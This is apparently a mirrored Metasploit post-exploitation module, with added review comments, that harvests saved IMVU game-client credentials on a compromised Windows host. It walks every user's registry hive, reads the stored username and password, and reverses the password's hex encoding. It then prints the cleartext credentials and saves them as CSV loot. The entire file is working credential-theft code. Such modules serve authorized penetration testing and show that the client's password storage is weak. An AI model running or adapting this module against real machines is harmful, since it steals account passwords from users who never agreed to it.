Mirror of metasploit

imvu.rb 2.2KB

  1. # -*- coding: binary -*-
  2. ##
  3. # This module requires Metasploit: http://metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6. require 'msf/core'
  7. require 'msf/core/auxiliary/report'
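  # Post module that reads the IMVU client's saved username and password from
  # each user's registry hive (HKU\<hive>\Software\IMVU\username and
  # ...\password, default value) and stores the result as loot.
  #
  # Security-relevant points for a reader:
  # * The stored password is recovered below with a plain hex decode; no key or
  #   secret is involved, so the registry value is an encoding, not encryption.
  # * The recovered password is printed to the console and written to a CSV
  #   loot file in cleartext; both should be handled as sensitive data.
  # * Hives returned by load_missing_hives are handed back to
  #   unload_our_hives when the scan ends, including when it ends on an error.
  class MetasploitModule < Msf::Post
    include Msf::Post::Windows::Registry
    include Msf::Auxiliary::Report
    include Msf::Post::Windows::UserProfiles

    # Registers the module metadata with the framework.
    #
    # @param info [Hash] metadata passed in by the framework, merged via update_info
    def initialize(info = {})
      super(update_info(info,
        'Name' => 'Windows Gather Credentials IMVU Game Client',
        'Description' => %q{
          This module extracts account username & password from the IMVU game client
          and stores it as loot.
        },
        'Author' =>
          [
            'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com
          ],
        'License' => MSF_LICENSE,
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      ))
    end

    # Walks every user hive, collects IMVU credentials into a table and, when
    # at least one was found, stores the table as CSV loot.
    #
    # @return [void]
    def run
      creds = Rex::Text::Table.new(
        'Header' => 'IMVU Credentials',
        'Indent' => 1,
        'Columns' => [
          'User',
          'Password'
        ]
      )

      credcount = 0
      userhives = load_missing_hives

      begin
        userhives.each do |hive|
          next if hive['HKU'].nil?

          vprint_status("Looking at Key #{hive['HKU']}")
          subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")
          if subkeys.nil? || subkeys.empty?
            print_status("IMVU not installed for this user.")
            next
          end

          user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", "")
          hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", "")

          # The IMVU key can exist without a saved password (presumably when
          # the user never chose to save it -- confirm). Calling String methods
          # on nil here would abort the run before the hives are unloaded.
          if hpass.nil?
            print_status("No saved IMVU password for this user.")
            next
          end

          decpass = decode_imvu_password(hpass)
          # NOTE(review): this writes the cleartext password to the console.
          print_good("User=#{user}, Password=#{decpass}")
          creds << [user, decpass]
          credcount += 1
        end
      ensure
        # Clean up after ourselves even if a registry read or decode raised,
        # so no hive loaded for this run is left mounted on the host.
        unload_our_hives(userhives)
      end

      print_status("#{credcount} Credentials were found.")
      return unless credcount > 0

      print_status("Storing data...")
      # The loot file holds usernames and cleartext passwords as CSV.
      path = store_loot(
        'imvu.user.creds',
        'text/csv',
        session,
        creds.to_csv,
        'imvu_user_creds.csv',
        'IMVU User Credentials'
      )
      print_status("IMVU user credentials saved in: #{path}")
    end

    private

    # Turns the stored registry string into the original password bytes.
    #
    # The value is lower-cased, single quotes are removed, and each hex pair
    # optionally prefixed with "x" or "\x" is reduced to the bare pair; the
    # resulting hex string is then packed into raw bytes.
    #
    # @param hpass [String] raw value read from the IMVU password key
    # @return [String] decoded password bytes
    def decode_imvu_password(hpass)
      hex = hpass.downcase.gsub(/'/, '').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1')
      [hex].pack("H*")
    end
  end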